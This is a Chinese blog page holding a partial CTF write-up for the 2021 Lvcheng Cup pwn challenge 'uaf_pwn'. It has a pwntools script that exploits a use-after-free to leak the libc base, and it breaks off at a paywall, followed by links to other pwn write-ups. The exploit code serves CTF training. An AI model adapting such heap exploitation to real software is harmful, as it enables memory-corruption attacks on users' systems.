2021绿城杯pwn部分wp

最新推荐文章于 2025-11-21 17:07:25 发布
原创 最新推荐文章于 2025-11-21 17:07:25 发布 · 2k 阅读 · 1
标签
#ctf

前言:

这次比赛了解到了还有jspwn这玩意, 然后没时间学(, 十月一定(逃)

uafpwn:

在这里插入图片描述释放之后指针未置零, 所以use after free乱打

from pwn import *

context(log_level = 'debug', arch = 'amd64')
# sh = process('./uaf_pwn')
sh = remote('82.157.5.28', 52102)
elf = ELF('./uaf_pwn')
libc = elf.libc

def add(size):
   sh.recvuntil('>')
   sh.sendline('1')
   sh.recvuntil('size>')
   sh.sendline(str(size))

def free(idx):
   sh.recvuntil('>')
   sh.sendline('2')
   sh.recvuntil('index>')
   sh.sendline(str(idx))

def edit(idx, content):
   sh.recvuntil('>')
   sh.sendline('3')
   sh.recvuntil('index>')
   sh.sendline(str(idx))
   sh.recvuntil('content>')
   sh.sendline(content)

def show(idx):
   sh.recvuntil('>')
   sh.sendline('4')
   sh.recvuntil('index>')
   sh.sendline(str(idx))

add(0x80)
add(0x10)
free(0)
show(0)
leak_addr = u64(sh.recvuntil('\x7f').ljust(8, '\x00'))

libc_base = leak_addr - 0x58 - 0x10 - libc.sym['__malloc_hook']
log.success(hex(libc_base))
add(0x60)
free(0
最低0.47元/天 解锁文章
pwnjs一个用于浏览器开发的Javascript库
08-09
pwn.js 一个用于浏览器开发的Javascript库
pwn:JavaScript事件系统的100 SLOC处理
05-15
wn JavaScript事件系统的<100 SLOC破坏。 从您自己的构造对象中委托它! 使用obj.prototype = Object.create(pwn); pwn您的对象没错-甚至不必担心您的构造函数-那是一些伪古典的垃圾。 你把它铺好了。 注册新的事件监听器 // obj.on(event, callback, context) obj . on ( 'change' , func , this ) ; // register listener with this context obj . on ( 'change' , func ) ; // register listener with obj's context 取消注册旧的事件监听器 // obj.off(event, callback, context) obj . off ( 'change' ,
pwn刷题num13---js交互式命令行模式
tbsqigongzi的博客
04-22 1020
攻防世界pwn进阶区monkey 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位,小端序 未开启RELRO---got表可写 未开启canary保护---存在栈溢出 开启NX保护----注入的shellcode不可执行 未开启PIE----程序地址为真实地址 动态链接 运行后出现一个js>很奇怪 ida后找不到主函数 怀疑不是c语言程序 上查一下js,意思是JavaScript 看了别人的wp,发现这个程序直接是js的交互式命令行模式 os.system(
XCTF PWN高手进阶区 之 js
neuisf的博客
01-28 377
本题程序名为js,随便输入字符串,发现: 输入字符串会打印该字符串; 输入数字时会以科学计数法打印该数字; 输入加法算式会打印加法计算结果; 输入!1会打印false,输入!0会打印true; 输入js_fuck的命令: 提示eval函数执行时引用错误。 因此,推断程序执行是以输入为参数,调用eval运行。 于是: 输入print,打印print函数: 输入read,打印read函数: 1...
jscpwn 项目教程
gitblog_00694的博客
09-02 393
jscpwn 项目教程 1、项目的目录结构及介绍 jscpwn/ ├── LICENSE ├── README.md ├── email.html ├── int64.js ├── pwn.html ├── pwn.js └── utils.js LICENSE: 项目的许可证文件,采用 MIT 许可证。 README.md: 项目的说明文档。 email.html: 一个 HTML 文件,具...
[JSMSA_CTF] 2023年12月练习题 pwn
weixin_52640415的博客
12-08 328
libc-2.23 mallopt global_max_fast _IO_2_1_stdout_ orw
Chrome v8 pwn
sky123博客
04-17 5424
它是⼀个多进程+IPC的程序, 不同的进程管理不同的内容,
XCTF PWN高手进阶区之JS
neuisf的博客
01-27 482
本题程序名为js,随便输入字符串,发现: 输入字符串会打印该字符串; 输入数字时会以科学计数法打印该数字; 输入加法算式会打印加法计算结果; 输入!1会打印false,输入!0会打印true; 输入js_fuck的命令: 提示eval函数执行时引用错误。 因此,推断程序执行是以输入为参数,调用eval运行。 于是: 输入print,打印print函数: 输入read,打印re...
考核PWNwp(未完待续)
m0_75234353的博客
05-23 372
就是要输入一个负数,然后进行num=-num,再判断是否为负数,是的话成功绕过,再进入vuln函数。vuln函数给了system函数,但参数需要自己压入栈内。我们再去看看num=-num是怎么具体实现的,直接看汇编语言。发现是依靠neg指令来完成的。
Pwnwp
weixin_52553215的博客
11-22 1056
如%100×10$n 表示将 0x64 写入偏移 10 处保存的指针所指向的地址(4字节),而$hn 表示写入的地址空间为 2 字节,$hhn 表示写入的地址空间为 1字节,%$lln 表示写入的地址空间为 8 字节,在 32bit 和 64bit 环境下一样。猜测 0x40060d 这个地址是个函数,运行这个函数可以直接拿到 flag,那我们只需要去不断的填充垃圾数据,然后在后面加个给的地址(也可能是不加,分情况讨论),不断尝试,直到把这个地址填充到返回地址的位置。
2023CISCN—华中赛区—pwn wp
m0_63437215的博客
07-13 1730
ciscn2023华中赛区pwn
PwnTheBox-Jsfuck详解
x1520700的博客
05-27 1430
题目介绍 知识点: div盒子定义:包容js代码一切的东西,也就是F12查看器那的 Jsfuck是什么 控制台具有JSfuck解密的效果 编码认识:U2FsdGVkX1 是AES或DES 开头 一、审题、进行判断 进入题目,看见一个输入功能框,结合对xss的认识,又看见js误以为是xss注入,结果发现并不是; 通过仔细审题可以发现有一个定义词(JSPFUCK),网上百度一下,给了个介绍: ...
[CTF-PWN]攻防世界新手村-hello_pwn[wp]
murongxuege的博客
10-01 2785
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 从描述中可以看出当前程序是要进行年龄的输入操作的,有输入操作,还是在新手村,那么大概率是gets()等C函数输入漏洞,进一步猜测是普通的内存地址覆盖的题。 che
几道buuctf pwn wp
weixin_44113469的博客
02-07 490
buuctf wp try_your_nc from pwn import * from sys import * debug=1 if debug: p=remote("node3.buuoj.cn",26062) else: p=process("xxx") p.interactive() pwn1_sctf_2016 C++ 写的,害,输入I, 会转换为you,所以有溢出啊,还有后面函数 from pwn import * from sys import * debug=1 c
攻防世界hello pwn WPpwn入门基础题)
m0_62584974的博客
11-21 2919
攻防世界hello pwn WPpwn入门基础题)的简单讲解
DASCTF X GFCTF 2024|四月开启第一局[PWN] wp(详解)
susu_xiaosu的博客
07-08 1178
【代码】DASCTF X GFCTF 2024|四月开启第一局[PWN] wp(详解)
Hgame2024week1:pwn wp
2302_79813730的博客
02-18 1063
通过题目就可以看出来这是一道随机数的题,并且第一次read可以覆盖种子,覆盖了种子我们就知道随机数是怎样生成的了,一般我们直接覆盖成0。我们需要进入到这个函数让后去输入特定的shellcode,因为过滤了一些字符,这里有一个新的知识点,//gcc 1.c -o 1 ###终端名称生成1程序,运行1得到我们要的数组。主函数也没什么,这个可以结合调试去看,会让我们输入一个数字。随机数绕过后就进入myread函数,没有后门直接libc。vuln函数有栈溢出,但溢出字节不够需要用到栈迁移。
BUUCTF题目Reverse & Pwn部分wp(持续更新)
苦行僧的妖孽日常
09-18 4511
BUUCTF题目Rverse & Pwn部分的writeup(持续更新)
2025 UCSCCTF Pwn-wp(含附件)
XiDPPython的博客
04-20 1443
通过网盘分享的文件:2025UCSCCTF.rar链接: https://pan.baidu.com/s/17yqcmGRXWN1oNMvgZNRv5w?pwd=xidp 提取码: xidp内含2025 UCSCCTF三个pwn题的附件由于题目比较简单我就简单介绍我的思路并放上exp了。
攻防世界Pwn 引导模式 WP
最新发布
m0_55433185的博客
11-21 1389
重新梳理一下pwn的基础的题目类型,理解pwn的全部的流程,这里从攻防世界pwn的引导模式开始。博主才疏学浅可能有些地方没讲清楚请见谅。内容会不定时更新。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值